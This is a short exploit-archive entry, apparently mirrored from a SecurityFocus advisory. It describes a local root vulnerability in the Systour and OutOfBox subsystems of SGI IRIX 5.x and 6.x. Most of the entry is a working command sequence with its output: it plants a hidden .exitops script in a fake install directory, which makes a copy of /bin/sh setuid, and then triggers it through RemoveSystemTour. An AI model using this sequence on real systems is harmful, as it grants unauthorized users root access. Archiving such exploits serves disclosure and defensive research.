17 lines
No EOL
807 B
Text
17 lines
No EOL
807 B
Text
source: https://www.securityfocus.com/bid/470/info
|
|
|
|
A vulnerability exists in both the Systour and OutOfBox susbsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root.
|
|
|
|
$ rbase=$HOME; export rbase
|
|
$ mkdir -p $HOME/var/inst
|
|
$ echo "dryrun: true" > $HOME/.swmgrrc
|
|
$ cp -p /bin/sh /tmp/foobar
|
|
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
|
|
$ chmod a+x $HOME/var/inst/.exitops
|
|
$ /usr/lib/tour/bin/RemoveSystemTour
|
|
Executing outstanding exit-commands from previous session ..
|
|
Successfully completed exit-commands from previous session.
|
|
Reading installation history
|
|
Checking dependencies
|
|
ERROR : Software Manager: automatic installation failed: New
|
|
target (nothing installed) and no distribution. |